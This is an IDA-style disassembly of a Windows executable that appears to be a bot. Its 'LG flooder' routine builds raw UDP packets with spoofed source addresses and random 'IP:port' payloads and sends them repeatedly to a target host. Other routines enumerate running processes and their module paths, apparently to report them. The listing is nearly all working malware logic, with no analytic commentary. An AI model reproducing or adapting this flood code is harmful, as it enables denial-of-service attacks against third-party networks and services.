jnz short loc_40567E
push [ebp+var_1334]
call sub_409763
pop ecx
xor eax, eax
jmp locret_405E41
; ---------------------------------------------------------------------------
loc_40567E: ; CODE XREF: sub_4055E5+84�j
push 0
push [ebp+var_1078]
call sub_404457
pop ecx
pop ecx
push 10h
push 0
lea eax, [ebp+var_10]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_10], 2
lea eax, [ebp+var_108D]
push eax
call sub_416B9C ; atoi
pop ecx
push eax
call dword_417238 ; ntohs
mov [ebp+var_E], ax
lea eax, [ebp+var_118D]
push eax
call dword_417244 ; inet_addr
mov [ebp+var_C], eax
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_405710
lea eax, [ebp+var_118D]
push eax
call dword_41723C ; gethostbyname
mov [ebp+var_1344], eax
cmp [ebp+var_1344], 0
jnz short loc_405700
push [ebp+var_1334]
call sub_409763
pop ecx
xor eax, eax
jmp locret_405E41
; ---------------------------------------------------------------------------
loc_405700: ; CODE XREF: sub_4055E5+106�j
mov eax, [ebp+var_1344]
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_C], eax
loc_405710: ; CODE XREF: sub_4055E5+EA�j
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_405729
push [ebp+var_1334]
call sub_409763
pop ecx
xor eax, eax
jmp locret_405E41
; ---------------------------------------------------------------------------
loc_405729: ; CODE XREF: sub_4055E5+12F�j
push 1060h
push 0
lea eax, [ebp+var_1074]
push eax
call sub_416B6A ; memset
add esp, 0Ch
lea eax, [ebp+var_1074]
mov [ebp+var_133C], eax
lea eax, [ebp+var_1058]
mov [ebp+var_14], eax
mov eax, [ebp+var_133C]
mov al, [eax]
and al, 0F0h
or al, 5
mov ecx, [ebp+var_133C]
mov [ecx], al
mov eax, [ebp+var_133C]
mov al, [eax]
and al, 0Fh
or al, 40h
mov ecx, [ebp+var_133C]
mov [ecx], al
mov eax, [ebp+var_133C]
mov byte ptr [eax+9], 11h
mov eax, [ebp+var_133C]
mov ecx, [ebp+var_C]
mov [eax+10h], ecx
mov eax, [ebp+var_133C]
mov cx, [ebp+var_E]
mov [eax+16h], cx
and [ebp+var_1338], 0
jmp short loc_4057B6
; ---------------------------------------------------------------------------
loc_4057A9: ; CODE XREF: sub_4055E5:loc_405E22�j
mov eax, [ebp+var_1338]
inc eax
mov [ebp+var_1338], eax
loc_4057B6: ; CODE XREF: sub_4055E5+1C2�j
mov eax, [ebp+var_1338]
cmp eax, [ebp+var_1087]
jge loc_405E27
mov eax, [ebp+var_107F]
mov [ebp+var_1358], eax
cmp [ebp+var_1358], 1
jz short loc_4057FC
cmp [ebp+var_1358], 2
jz loc_405924
cmp [ebp+var_1358], 3
jz loc_405A11
jmp loc_405C71
; ---------------------------------------------------------------------------
loc_4057FC: ; CODE XREF: sub_4055E5+1F6�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset aU ; "%u\r\n"
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_40581E: ; CODE XREF: sub_4055E5+2BF�j
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
cmp eax, 7D0h
jnb short loc_4058A9
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push offset aU_U_U_UU ; "%u.%u.%u.%u:%u\r\n"
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_40581E
; ---------------------------------------------------------------------------
loc_4058A9: ; CODE XREF: sub_4055E5+247�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push offset dword_418A64
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_405C93
; ---------------------------------------------------------------------------
loc_405924: ; CODE XREF: sub_4055E5+1FF�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset aU ; "%u\r\n"
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_405946: ; CODE XREF: sub_4055E5+3CB�j
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
cmp eax, 7D0h
jnb short loc_4059B2
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push offset aU_U_U_UU ; "%u.%u.%u.%u:%u\r\n"
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp short loc_405946
; ---------------------------------------------------------------------------
loc_4059B2: ; CODE XREF: sub_4055E5+36F�j
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push offset dword_418A64
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_405C93
; ---------------------------------------------------------------------------
loc_405A11: ; CODE XREF: sub_4055E5+20C�j
push 2
push 0
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_134C], eax
cmp [ebp+var_134C], 0
jnz short loc_405A52
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset dword_418A60
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
jmp loc_405C6F
; ---------------------------------------------------------------------------
loc_405A52: ; CODE XREF: sub_4055E5+444�j
cmp [ebp+var_134C], 1
jnz loc_405B87
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset aU ; "%u\r\n"
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_405A81: ; CODE XREF: sub_4055E5+522�j
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
cmp eax, 7D0h
jnb short loc_405B0C
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push offset aU_U_U_UU ; "%u.%u.%u.%u:%u\r\n"
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_405A81
; ---------------------------------------------------------------------------
loc_405B0C: ; CODE XREF: sub_4055E5+4AA�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 0FFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push offset dword_418A64
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp loc_405C6F
; ---------------------------------------------------------------------------
loc_405B87: ; CODE XREF: sub_4055E5+474�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset aU ; "%u\r\n"
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_405BA9: ; CODE XREF: sub_4055E5+62E�j
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
cmp eax, 7D0h
jnb short loc_405C15
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push offset aU_U_U_UU ; "%u.%u.%u.%u:%u\r\n"
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
jmp short loc_405BA9
; ---------------------------------------------------------------------------
loc_405C15: ; CODE XREF: sub_4055E5+5D2�j
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push 0
call sub_4103F5
pop ecx
pop ecx
movzx eax, al
push eax
push 1
push offset dword_418A64
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_14]
add ecx, eax
push ecx
call sub_416B5E ; sprintf
add esp, 1Ch
loc_405C6F: ; CODE XREF: sub_4055E5+468�j
; sub_4055E5+59D�j
jmp short loc_405C93
; ---------------------------------------------------------------------------
loc_405C71: ; CODE XREF: sub_4055E5+212�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
movzx eax, ax
push eax
push offset dword_418A60
push [ebp+var_14]
call sub_416B5E ; sprintf
add esp, 0Ch
loc_405C93: ; CODE XREF: sub_4055E5+33A�j
; sub_4055E5+427�j ...
push [ebp+var_14]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_1354], eax
and [ebp+var_1350], 0
jmp short loc_405CB8
; ---------------------------------------------------------------------------
loc_405CAB: ; CODE XREF: sub_4055E5+6F9�j
mov eax, [ebp+var_1350]
inc eax
mov [ebp+var_1350], eax
loc_405CB8: ; CODE XREF: sub_4055E5+6C4�j
mov eax, [ebp+var_1350]
cmp eax, [ebp+var_1354]
jnb short loc_405CE0
mov eax, [ebp+var_14]
add eax, [ebp+var_1350]
mov al, [eax]
shl al, 1
mov ecx, [ebp+var_14]
add ecx, [ebp+var_1350]
mov [ecx], al
jmp short loc_405CAB
; ---------------------------------------------------------------------------
loc_405CE0: ; CODE XREF: sub_4055E5+6DF�j
mov eax, [ebp+var_1354]
add eax, 1Ch
push eax
call dword_417238 ; ntohs
mov ecx, [ebp+var_133C]
mov [ecx+2], ax
call sub_41043F
push eax
call dword_417238 ; ntohs
mov ecx, [ebp+var_133C]
mov [ecx+4], ax
call sub_410483
neg eax
sbb eax, eax
and al, 0C0h
add eax, 80h
mov ecx, [ebp+var_133C]
mov [ecx+8], al
push 2
push offset dword_41EFD8
call dword_417244 ; inet_addr
push eax
call sub_4040E8
pop ecx
pop ecx
mov ecx, [ebp+var_133C]
mov [ecx+0Ch], eax
mov eax, [ebp+var_1354]
add eax, 14h
push eax
push [ebp+var_133C]
call sub_40407D
pop ecx
pop ecx
mov ecx, [ebp+var_133C]
mov [ecx+0Ah], ax
movzx eax, [ebp+var_E]
test eax, eax
jnz short loc_405D7F
call sub_41043F
mov ecx, [ebp+var_133C]
mov [ecx+16h], ax
loc_405D7F: ; CODE XREF: sub_4055E5+789�j
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
push eax
call dword_417238 ; ntohs
mov ecx, [ebp+var_133C]
mov [ecx+14h], ax
mov eax, [ebp+var_1354]
add eax, 8
push eax
call dword_417238 ; ntohs
mov ecx, [ebp+var_133C]
mov [ecx+18h], ax
push 10h
lea eax, [ebp+var_10]
push eax
push 0
mov eax, [ebp+var_1354]
add eax, 1Ch
push eax
lea eax, [ebp+var_1074]
push eax
push [ebp+var_1078]
call dword_417250 ; sendto
mov [ebp+var_1348], eax
cmp [ebp+var_1348], 0FFFFFFFFh
jnz short loc_405E08
push [ebp+var_1334]
call sub_409763
pop ecx
push [ebp+var_1078]
call sub_4053B1
pop ecx
xor eax, eax
jmp short locret_405E41
; ---------------------------------------------------------------------------
loc_405E08: ; CODE XREF: sub_4055E5+805�j
push [ebp+var_1083]
call dword_41709C ; Sleep
mov eax, [ebp+var_1334]
cmp dword ptr [eax+4], 0
jz short loc_405E22
jmp short loc_405E27
; ---------------------------------------------------------------------------
loc_405E22: ; CODE XREF: sub_4055E5+839�j
jmp loc_4057A9
; ---------------------------------------------------------------------------
loc_405E27: ; CODE XREF: sub_4055E5+1DD�j
; sub_4055E5+83B�j
push [ebp+var_1078]
call sub_4053B1
pop ecx
push [ebp+var_1334]
call sub_409763
pop ecx
xor eax, eax
locret_405E41: ; CODE XREF: sub_4055E5+59�j
; sub_4055E5+94�j ...
leave
retn 4
sub_4055E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405E45 proc near ; CODE XREF: sub_40A9CF+8B2�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_4], 0
jz short loc_405E5D
cmp [ebp+arg_8], 0
jz short loc_405E5D
cmp [ebp+arg_14], 0
jnz short loc_405E62
loc_405E5D: ; CODE XREF: sub_405E45+A�j
; sub_405E45+10�j
jmp locret_405F65
; ---------------------------------------------------------------------------
loc_405E62: ; CODE XREF: sub_405E45+16�j
push 2B9h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_405E7B
jmp locret_405F65
; ---------------------------------------------------------------------------
loc_405E7B: ; CODE XREF: sub_405E45+2F�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push 100h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 1A7h
push eax
call sub_407A56
add esp, 0Ch
push 6
push [ebp+arg_8]
mov eax, [ebp+var_4]
add eax, 2A7h
push eax
call sub_407A56
add esp, 0Ch
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+2ADh], eax
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+2B1h], eax
push [ebp+arg_14]
call sub_416B9C ; atoi
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+2B5h], eax
mov eax, [ebp+var_4]
cmp dword ptr [eax+2B1h], 0EA60h
jge short loc_405F0E
mov eax, [ebp+var_4]
mov eax, [eax+2B1h]
mov [ebp+var_8], eax
jmp short loc_405F15
; ---------------------------------------------------------------------------
loc_405F0E: ; CODE XREF: sub_405E45+B9�j
mov [ebp+var_8], 0EA60h
loc_405F15: ; CODE XREF: sub_405E45+C7�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_8]
mov [eax+2B1h], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax+2B1h], 64h
jle short loc_405F3B
mov eax, [ebp+var_4]
mov eax, [eax+2B1h]
mov [ebp+var_C], eax
jmp short loc_405F42
; ---------------------------------------------------------------------------
loc_405F3B: ; CODE XREF: sub_405E45+E6�j
mov [ebp+var_C], 64h
loc_405F42: ; CODE XREF: sub_405E45+F4�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_C]
mov [eax+2B1h], ecx
push offset aLgFlooder ; "LG flooder"
push 0
push [ebp+var_4]
push offset sub_4055E5
call sub_4095A4
add esp, 10h
locret_405F65: ; CODE XREF: sub_405E45:loc_405E5D�j
; sub_405E45+31�j
leave
retn
sub_405E45 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405F67 proc near ; CODE XREF: sub_4017AA+6E�p
; sub_401D6E+77�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
jnz short loc_405F8E
push 1A3h
push 0
push [ebp+arg_0]
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_0]
mov byte ptr [eax+198h], 1
jmp short loc_405FA1
; ---------------------------------------------------------------------------
loc_405F8E: ; CODE XREF: sub_405F67+7�j
push 1A3h
push [ebp+arg_4]
push [ebp+arg_0]
call sub_416B52 ; memcpy
add esp, 0Ch
loc_405FA1: ; CODE XREF: sub_405F67+25�j
pop ebp
retn
sub_405F67 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405FA3 proc near ; CODE XREF: .packed:004168C1�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push offset dword_41E340
call sub_409C36
pop ecx
push offset aPsapi_dll ; "psapi.dll"
call dword_417054 ; LoadLibraryA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_405FC8
jmp short locret_40603F
; ---------------------------------------------------------------------------
loc_405FC8: ; CODE XREF: sub_405FA3+21�j
push offset aEnumprocesses ; "EnumProcesses"
push [ebp+var_4]
call dword_417058 ; GetProcAddress
mov dword_41E33C, eax
push offset aEnumprocessmod ; "EnumProcessModules"
push [ebp+var_4]
call dword_417058 ; GetProcAddress
mov dword_41E330, eax
push offset aGetmodulefilen ; "GetModuleFileNameExA"
push [ebp+var_4]
call dword_417058 ; GetProcAddress
mov dword_41E334, eax
push offset aGetmoduleinfor ; "GetModuleInformation"
push [ebp+var_4]
call dword_417058 ; GetProcAddress
mov dword_41E338, eax
cmp dword_41E33C, 0
jz short locret_40603F
cmp dword_41E330, 0
jz short locret_40603F
cmp dword_41E334, 0
jz short locret_40603F
cmp dword_41E338, 0
jz short locret_40603F
mov byte_41E35C, 1
locret_40603F: ; CODE XREF: sub_405FA3+23�j
; sub_405FA3+78�j ...
leave
retn
sub_405FA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406041 proc near ; CODE XREF: sub_401244:loc_40129D�p
; sub_40637C+29�p
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_130 = dword ptr -130h
var_12C = byte ptr -12Ch
var_12B = byte ptr -12Bh
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 13Ch
push esi
push edi
push offset dword_41E340
call sub_409C6C
pop ecx
movzx eax, byte_41E35C
test eax, eax
jnz short loc_406074
push offset dword_41E340
call sub_409C7A
pop ecx
xor eax, eax
jmp loc_40636A
; ---------------------------------------------------------------------------
loc_406074: ; CODE XREF: sub_406041+1F�j
and [ebp+var_C], 0
and [ebp+var_4], 0
and [ebp+var_1C], 0
push [ebp+var_1C]
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_406097
jmp loc_406368
; ---------------------------------------------------------------------------
loc_406097: ; CODE XREF: sub_406041+4F�j
; sub_406041:loc_4060E9�j
mov eax, [ebp+var_1C]
add eax, 80h
mov [ebp+var_1C], eax
push [ebp+var_1C]
push [ebp+var_14]
call sub_416BF6 ; realloc
pop ecx
pop ecx
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_4060BD
jmp loc_406366
; ---------------------------------------------------------------------------
loc_4060BD: ; CODE XREF: sub_406041+75�j
lea eax, [ebp+var_4]
push eax
push [ebp+var_1C]
push [ebp+var_14]
call dword_41E33C
test eax, eax
jnz short loc_4060DF
push [ebp+var_14]
call sub_416B4C ; free
pop ecx
jmp loc_406364
; ---------------------------------------------------------------------------
loc_4060DF: ; CODE XREF: sub_406041+8E�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_1C]
jnb short loc_4060E9
jmp short loc_4060EB
; ---------------------------------------------------------------------------
loc_4060E9: ; CODE XREF: sub_406041+A4�j
jmp short loc_406097
; ---------------------------------------------------------------------------
loc_4060EB: ; CODE XREF: sub_406041+A6�j
mov eax, [ebp+var_4]
shr eax, 2
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
imul eax, 114h
add eax, 8
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_40611E
push [ebp+var_14]
call sub_416B4C ; free
pop ecx
jmp loc_406362
; ---------------------------------------------------------------------------
loc_40611E: ; CODE XREF: sub_406041+CD�j
mov eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [eax], ecx
mov eax, [ebp+var_C]
add eax, 8
mov ecx, [ebp+var_C]
mov [ecx+4], eax
and [ebp+var_10], 0
jmp short loc_40613F
; ---------------------------------------------------------------------------
loc_406138: ; CODE XREF: sub_406041+156�j
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_10], eax
loc_40613F: ; CODE XREF: sub_406041+F5�j
mov eax, [ebp+var_10]
cmp eax, [ebp+var_8]
jnb short loc_406199
push 114h
push 0
mov eax, [ebp+var_C]
push dword ptr [eax+4]
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
mov edx, [ebp+var_10]
mov esi, [ebp+var_14]
mov edx, [esi+edx*4]
mov [ecx+eax], edx
push offset aSystem ; "system"
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_406138
; ---------------------------------------------------------------------------
loc_406199: ; CODE XREF: sub_406041+104�j
push [ebp+var_14]
call sub_416B4C ; free
pop ecx
and [ebp+var_10], 0
jmp short loc_4061AF
; ---------------------------------------------------------------------------
loc_4061A8: ; CODE XREF: sub_406041+1A8�j
; sub_406041+1D8�j ...
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_10], eax
loc_4061AF: ; CODE XREF: sub_406041+165�j
mov eax, [ebp+var_10]
cmp eax, [ebp+var_8]
jnb loc_406343
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
push dword ptr [ecx+eax]
push 0
push 410h
call dword_417094 ; OpenProcess
mov [ebp+var_130], eax
cmp [ebp+var_130], 0
jnz short loc_4061EB
jmp short loc_4061A8
; ---------------------------------------------------------------------------
loc_4061EB: ; CODE XREF: sub_406041+1A6�j
and [ebp+var_20], 0
and [ebp+var_28], 0
lea eax, [ebp+var_20]
push eax
push 4
lea eax, [ebp+var_28]
push eax
push [ebp+var_130]
call dword_41E330
test eax, eax
jnz short loc_40621B
push [ebp+var_130]
call dword_4170A4 ; CloseHandle
jmp short loc_4061A8
; ---------------------------------------------------------------------------
loc_40621B: ; CODE XREF: sub_406041+1CA�j
push 0Ch
lea eax, [ebp+var_13C]
push eax
push [ebp+var_28]
push [ebp+var_130]
call dword_41E338
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
mov edx, [ebp+var_13C]
mov [ecx+eax+4], edx
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
mov edx, [ebp+var_138]
mov [ecx+eax+8], edx
mov al, byte_41DEC0
mov [ebp+var_12C], al
push 40h
pop ecx
xor eax, eax
lea edi, [ebp+var_12B]
rep stosd
stosw
stosb
push 104h
lea eax, [ebp+var_12C]
push eax
push [ebp+var_13C]
push [ebp+var_130]
call dword_41E334
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz loc_406332
movsx eax, [ebp+var_12C]
test eax, eax
jz short loc_406332
push 104h
lea eax, [ebp+var_12C]
push eax
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
lea eax, [ebp+var_12C]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_18], eax
jmp short loc_4062F7
; ---------------------------------------------------------------------------
loc_4062F0: ; CODE XREF: sub_406041:loc_406330�j
mov eax, [ebp+var_18]
dec eax
mov [ebp+var_18], eax
loc_4062F7: ; CODE XREF: sub_406041+2AD�j
cmp [ebp+var_18], 0
jz short loc_406332
cmp [ebp+var_18], 1
ja short loc_406305
jmp short loc_406332
; ---------------------------------------------------------------------------
loc_406305: ; CODE XREF: sub_406041+2C0�j
mov eax, [ebp+var_18]
movsx eax, byte ptr [ebp+eax+var_130+3]
cmp eax, 5Ch
jnz short loc_406330
mov eax, [ebp+var_10]
imul eax, 114h
mov ecx, [ebp+var_C]
mov ecx, [ecx+4]
mov edx, [ebp+var_18]
mov [ecx+eax+110h], edx
jmp short loc_406332
; ---------------------------------------------------------------------------
loc_406330: ; CODE XREF: sub_406041+2D2�j
jmp short loc_4062F0
; ---------------------------------------------------------------------------
loc_406332: ; CODE XREF: sub_406041+264�j
; sub_406041+273�j ...
push [ebp+var_130]
call dword_4170A4 ; CloseHandle
jmp loc_4061A8
; ---------------------------------------------------------------------------
loc_406343: ; CODE XREF: sub_406041+174�j
push offset dword_41E340
call sub_409C7A
pop ecx
mov eax, [ebp+var_C]
jmp short loc_40636A
; ---------------------------------------------------------------------------
loc_406353: ; CODE XREF: sub_406041:loc_406362�j
; sub_406041:loc_406364�j ...
push offset dword_41E340
call sub_409C7A
pop ecx
xor eax, eax
jmp short loc_40636A
; ---------------------------------------------------------------------------
loc_406362: ; CODE XREF: sub_406041+D8�j
jmp short loc_406353
; ---------------------------------------------------------------------------
loc_406364: ; CODE XREF: sub_406041+99�j
jmp short loc_406353
; ---------------------------------------------------------------------------
loc_406366: ; CODE XREF: sub_406041+77�j
jmp short loc_406353
; ---------------------------------------------------------------------------
loc_406368: ; CODE XREF: sub_406041+51�j
jmp short loc_406353
; ---------------------------------------------------------------------------
loc_40636A: ; CODE XREF: sub_406041+2E�j
; sub_406041+310�j ...
pop edi
pop esi
leave
retn
sub_406041 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40636E proc near ; CODE XREF: sub_401244+4D2�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
pop ebp
retn
sub_40636E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40637C proc near ; DATA XREF: sub_4064BF+3B�o
var_1B0 = dword ptr -1B0h
var_1AC = dword ptr -1ACh
var_1A8 = dword ptr -1A8h
var_1A4 = byte ptr -1A4h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1B0h
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_1A8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
call sub_406041
mov [ebp+var_1AC], eax
cmp [ebp+var_1AC], 0
jz loc_4064AD
mov eax, [ebp+var_1AC]
push dword ptr [eax]
mov eax, [ebp+var_1A8]
push dword ptr [eax]
push offset dword_418B1C
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
and [ebp+var_1B0], 0
jmp short loc_4063F7
; ---------------------------------------------------------------------------
loc_4063EA: ; CODE XREF: sub_40637C:loc_40649C�j
mov eax, [ebp+var_1B0]
inc eax
mov [ebp+var_1B0], eax
loc_4063F7: ; CODE XREF: sub_40637C+6C�j
mov eax, [ebp+var_1AC]
mov ecx, [ebp+var_1B0]
cmp ecx, [eax]
jge loc_4064A1
push 3E8h
call dword_41709C ; Sleep
mov eax, [ebp+var_1B0]
imul eax, 114h
mov ecx, [ebp+var_1AC]
mov ecx, [ecx+4]
lea eax, [ecx+eax+0Ch]
push eax
mov eax, [ebp+var_1B0]
imul eax, 114h
mov ecx, [ebp+var_1AC]
mov ecx, [ecx+4]
push dword ptr [ecx+eax+8]
mov eax, [ebp+var_1B0]
imul eax, 114h
mov ecx, [ebp+var_1AC]
mov ecx, [ecx+4]
push dword ptr [ecx+eax+4]
mov eax, [ebp+var_1B0]
imul eax, 114h
mov ecx, [ebp+var_1AC]
mov ecx, [ecx+4]
push dword ptr [ecx+eax]
push offset dword_418B04
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 18h
mov eax, [ebp+var_1A8]
cmp dword ptr [eax+4], 0
jz short loc_40649C
jmp short loc_4064A1
